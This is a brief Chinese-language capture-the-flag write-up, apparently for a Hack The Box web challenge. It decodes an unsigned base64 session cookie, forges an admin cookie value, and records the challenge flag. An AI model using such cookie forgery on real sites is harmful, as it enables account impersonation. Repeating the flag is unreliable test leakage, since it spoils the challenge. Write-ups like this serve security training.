# 题目描述
(无附件)
# 观察
打开网站:
注册个账号然后登录试试:
查看当前 cookie:
这段内容 base64 解码可以得到:
eyJ1c2VybmFtZSI6IjEyMyJ9
{"username":"123"}
# 渗透
将 cookie 改成
{"username":"admin"}
的 base64,即
eyJ1c2VybmFtZSI6ImFkbWluIn0=
修改 cookie 然后刷新网页:
得到 flag: HTB{s3ss10n_1nt3grity_1s_0v3r4tt3d_4nyw4ys} 。
